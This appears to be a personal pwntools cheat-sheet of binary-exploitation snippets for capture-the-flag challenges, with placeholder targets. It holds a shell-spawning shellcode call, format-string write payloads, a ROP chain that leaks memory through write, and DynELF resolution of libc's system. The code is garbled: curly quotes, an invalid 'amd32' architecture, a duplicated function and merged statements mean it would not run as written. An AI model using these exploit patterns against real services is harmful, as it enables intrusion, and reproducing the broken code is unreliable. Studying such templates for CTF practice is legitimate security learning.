#x86 ebp e
#x64 RDI,RSI,RDX,RCX,R8,R9
#coding:utf-8
context(os=‘linux’,arch=‘amd64’)
context(arch=‘amd32’)
shellcode=asm(shellcraft.sh())
context.log_level = ‘DEBUG’
from pwn import *
s = remote(‘xxx’,xxx)
s = process(’./xxx’)
gdb.attach(s)
elf = ELF(’./xxxx’)
plt = elf.plt[‘xxx’]
got = elf.got[‘xxx’]
symbols = elf.symbols[’’]
addr = int(s.recvuntil(’\n’), 16)
#format
payload = “aaaa_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x”
payload ="%85c%7$n"
s.recv()
s.recvuntil(‘xxx’)
s.send()
s.sendline()
s.interactive()
s.close()
raw_input(’#’)
#DynELF
d = DynELF(leak, elf = elf)
def leak(addr):
payload = ‘’
payload += ‘A’*padding #padding
payload += p32 (write_addr) #调用 write
payload += p32 (start_addr) #write 返回到 start
payload += p32 (1) #write 第一个参数 fd
payload += p32 (addr) #write 第二个参数 buf
payload += p32 (8) #write 第三个参数 size
s.sendline(payload)
content = s.recv()[:8]
print("%#x -> %s" %(addr, (content or ‘’).encode(‘hex’)))
return content
def leak(addr):
payload2leak_addr = “” + pack(addr) + “”
s.send(payload2leak_addr)
data = s.recv()
return data
d = DynELF(leak, pointer = pointer_into_ELF_file, elf = ELFObject) system_addr = d.lookup(“system”, libc)
system_addr = d.lookup(‘system’, ‘libc’)
